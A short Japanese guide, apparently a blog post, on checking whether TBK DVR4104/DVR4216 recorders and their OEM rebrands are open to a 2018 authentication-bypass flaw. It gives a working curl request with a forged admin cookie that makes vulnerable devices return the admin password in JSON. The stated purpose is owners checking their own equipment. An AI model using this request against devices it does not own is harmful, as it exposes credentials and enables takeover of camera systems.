IPカメラ、DVR(録画機)の脆弱性(セキュリティ)チェック方法2

TBK DVR4104、 DVR4216という種類のDVRについて2018年4月に報告された脆弱性

このDVRはOEMでいろんな会社のブランド名をつけて売られていて、現段階で有名どころは下記

Novo
CeNova
QSee
Pulnix
XVR 5 in 1 ←日本の会社の名前にリブランド見たことあり
Securus
Night OWL
DVR Login ←日本の会社の名前にリブランド見たことあり
HVR Login
MDVR Login

【脆弱性の確認方法】
まず、Macなどでターミナルを立ち上げる。
Windowsの場合にはteratermなどでOK

下記のコマンドをIPアドレスの箇所とポート番号だけ直して打ち込んでください。
例:192.168.1.10:80 (DVRのIPアドレスを192.168.1.10、公開しているポート番号を80にしている場合)

$> curl "http://192.168.***.***:ポート番号/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

もし、脆弱性のある機器であった場合、上記コマンドを実行するとjsonが返ってきて、
その中に下記のようなadminのパスワードが記載されています。

“uid”:”admin“,”pwd”:”パスワード

パスワードをはいてしまうので、これでシステムにログインが可能になってしまうという脆弱性になります。